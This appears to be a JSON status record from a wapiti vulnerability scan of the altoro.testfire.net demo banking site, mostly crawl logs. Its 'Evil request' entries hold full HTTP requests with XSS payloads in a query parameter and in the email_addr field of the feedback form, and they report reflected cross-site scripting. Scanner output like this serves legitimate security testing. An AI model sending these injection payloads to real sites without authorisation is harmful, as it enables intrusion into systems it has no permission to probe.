{
  "id": "85fd5da8-2d04-4322-9f43-ef662af8a7c6",
  "projectId": "VAPT-2026-4661",
  "target": "http://altoro.testfire.net/",
  "type": "wapiti",
  "status": "pending",
  "startedAt": "2026-03-05T13:33:18.898Z",
  "progress": 60,
  "options": {
    "wafBypass": false,
    "fullModules": false,
    "spaMode": false
  },
  "priority": "medium",
  "logs": [
    "[7:10:31 pm] Evil request:",
    "[7:10:31 pm] GET /index.jsp?content=%3CSvG%0AoNloAd%3Dalert%28%27winivpz30s%27%29%3E&job=Teller%3AConsumaerBanking HTTP/1.1\r\n    host: altoro.testfire.net\r\n    connection: keep-alive\r\n    user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0\r\n    accept-language: en-US\r\n    accept-encoding: gzip, deflate, br\r\n    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n    cookie: JSESSIONID=4CD71DA2BE1AFEEED4BA15579F97082C\r\n---",
    "[7:10:32 pm] ---",
    "[7:10:32 pm] Reflected Cross Site Scripting in http://altoro.testfire.net/sendFeedback via injection in the parameter email_addr",
    "[7:10:32 pm] Evil request:",
    "[7:10:32 pm] POST /sendFeedback HTTP/1.1\r\n    host: altoro.testfire.net\r\n    connection: keep-alive\r\n    user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0\r\n    accept-language: en-US\r\n    accept-encoding: gzip, deflate, br\r\n    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n    content-type: application/x-www-form-urlencoded\r\n    referer: http://altoro.testfire.net/feedback.jsp\r\n    cookie: JSESSIONID=4CD71DA2BE1AFEEED4BA15579F97082C\r\n    content-length: 144\r\n    Content-Type: application/x-www-form-urlencoded\r\n\r\n    cfile=comments.txt&name=default&email_addr=%3CSvG%0AoNloAd%3Dalert%28%27w1cmeduv9d%27%29%3E&subject=default&submit=%20Submit%20&comments=Hi%20there%21",
    "[7:10:32 pm] ---",
    "[7:10:33 pm] [*] Launching module permanentxss",
    "[7:10:33 pm] [+] GET http://altoro.testfire.net/ (0)",
    "[7:10:33 pm] [+] GET http://altoro.testfire.net/Privacypolicy.jsp (2)",
    "[7:10:33 pm] [+] GET http://altoro.testfire.net/Privacypolicy.jsp?sec=Careers&template=US (2)",
    "[7:10:33 pm] [+] GET http://altoro.testfire.net/default.jsp?content=security.htm (1)",
    "[7:10:34 pm] [+] GET http://altoro.testfire.net/default.jsp (1)",
    "[7:10:34 pm] [+] GET http://altoro.testfire.net/disclaimer.htm?url=http%3A%2F%2Fwww.netscape.com (2)",
    "[7:10:34 pm] [+] GET http://altoro.testfire.net/disclaimer.htm (2)",
    "[7:10:35 pm] [+] GET http://altoro.testfire.net/disclaimer.htm?url=http%3A%2F%2Fwww.microsoft.com (2)",
    "[7:10:35 pm] [+] GET http://altoro.testfire.net/doSubscribe (2)",
    "[7:10:35 pm] [+] GET http://altoro.testfire.net/feedback.jsp (1)",
    "[7:10:35 pm] [+] GET http://altoro.testfire.net/high_yield_investments.htm (2)",
    "[7:10:36 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_deposit.htm (1)",
    "[7:10:36 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_cards.htm (1)",
    "[7:10:36 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_insurance.htm (1)",
    "[7:10:37 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_contact.htm (1)",
    "[7:10:37 pm] [+] GET http://altoro.testfire.net/index.jsp?content=security.htm (1)",
    "[7:10:37 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_careers.htm (1)",
    "[7:10:37 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_about.htm (1)",
    "[7:10:38 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_press.htm (1)",
    "[7:10:38 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_investor.htm (1)",
    "[7:10:38 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_deposit.htm (1)",
    "[7:10:39 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_lending.htm (1)",
    "[7:10:39 pm] [+] GET http://altoro.testfire.net/index.jsp (1)",
    "[7:10:39 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_other.htm (1)",
    "[7:10:39 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_loans.htm (1)",
    "[7:10:40 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside.htm (1)",
    "[7:10:40 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_savings.htm (1)",
    "[7:10:40 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_checking.htm (1)",
    "[7:10:40 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_cards.htm (1)",
    "[7:10:41 pm] [+] GET http://altoro.testfire.net/index.jsp?content=privacy.htm (1)",
    "[7:10:41 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business_retirement.htm (1)",
    "[7:10:41 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal.htm (1)",
    "[7:10:42 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_other.htm (1)",
    "[7:10:42 pm] [+] GET http://altoro.testfire.net/index.jsp?content=personal_investments.htm (1)",
    "[7:10:42 pm] [+] GET http://altoro.testfire.net/index.jsp?content=business.htm (1)",
    "[7:10:44 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060518.htm (2)",
    "[7:10:44 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060817.htm (2)",
    "[7:10:44 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060928.htm (2)",
    "[7:10:45 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_internships.htm (2)",
    "[7:10:45 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20061005.htm (2)",
    "[7:10:45 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_benefits.htm (2)",
    "[7:10:45 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_community.htm (2)",
    "[7:10:46 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060921.htm (2)",
    "[7:10:46 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_executives.htm (2)",
    "[7:10:46 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060413.htm (2)",
    "[7:10:47 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20060720.htm (2)",
    "[7:10:47 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_trainee.htm (2)",
    "[7:10:47 pm] [+] GET http://altoro.testfire.net/index.jsp?content=pr%2F20061109.htm (2)",
    "[7:10:47 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm (2)",
    "[7:10:48 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=ExecutiveAssistant%3AAdministration (3)",
    "[7:10:48 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=OperationalRiskManager%3ARiskManagement (3)",
    "[7:10:48 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=CustomerServiceRepresentative%3ACustomerService (3)",
    "[7:10:49 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_volunteering.htm (3)",
    "[7:10:49 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=Teller%3AConsumaerBanking (3)",
    "[7:10:49 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=MortgageLendingAccountExecutive%3ASales (3)",
    "[7:10:49 pm] [+] GET http://altoro.testfire.net/index.jsp?content=inside_jobs.htm&job=LoyaltyMarketingProgramManager%3AMarketing (3)",
    "[7:10:50 pm] [+] GET http://altoro.testfire.net/inside_points_of_interest.htm (2)",
    "[7:10:50 pm] [+] GET http://altoro.testfire.net/login.jsp (1)",
    "[7:10:50 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/grouplife.htm (2)",
    "[7:10:51 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside_about.htm (3)",
    "[7:10:51 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_deposit.htm (3)",
    "[7:10:51 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp (3)",
    "[7:10:51 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_cards.htm (3)",
    "[7:10:52 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business.htm (3)",
    "[7:10:53 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_deposit.htm (3)",
    "[7:10:54 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_cards.htm (3)",
    "[7:10:55 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside_contact.htm (3)",
    "[7:10:55 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_insurance.htm (3)",
    "[7:10:57 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside_careers.htm (3)",
    "[7:10:57 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside.htm (3)",
    "[7:10:58 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside_press.htm (3)",
    "[7:10:58 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_other.htm (3)",
    "[7:10:58 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_lending.htm (3)",
    "[7:10:59 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=inside_investor.htm (3)",
    "[7:10:59 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_investments.htm (3)",
    "[7:10:59 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_other.htm (3)",
    "[7:10:59 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=business_retirement.htm (3)",
    "[7:11:00 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal.htm (3)",
    "[7:11:00 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_loans.htm (3)",
    "[7:11:00 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/index.jsp?content=personal_checking.htm (3)",
    "[7:11:00 pm] [+] GET http://altoro.testfire.net/my%20documents/JohnSmith/Bank%20Site%20Documents/subscribe.jsp (3)",
    "[7:11:01 pm] [+] GET http://altoro.testfire.net/retirement.htm (2)",
    "[7:11:01 pm] [+] GET http://altoro.testfire.net/search.jsp?query=default (1)",
    "[7:11:01 pm] [+] GET http://altoro.testfire.net/search.jsp (1)",
    "[7:11:02 pm] [+] GET http://altoro.testfire.net/security.htm (3)",
    "[7:11:02 pm] [+] GET http://altoro.testfire.net/sendFeedback (2)",
    "[7:11:02 pm] [+] GET http://altoro.testfire.net/status_check.jsp (1)",
    "[7:11:03 pm] [+] GET http://altoro.testfire.net/subscribe.jsp (1)",
    "[7:11:03 pm] [+] GET http://altoro.testfire.net/survey_questions.jsp (1)",
    "[7:11:03 pm] [+] GET http://altoro.testfire.net/survey_questions.jsp?step=a (2)",
    "[7:11:04 pm] [+] GET http://altoro.testfire.net/swagger/index.html (1)",
    "[7:11:04 pm] [+] POST http://altoro.testfire.net/doSubscribe (2)\r\n\tdata: txtEmail=VAPT Engine2021%40mailinator.com&btnSubmit=Subscribe"
  ],
  "savedAt": "2026-03-05T13:33:18.900Z"
}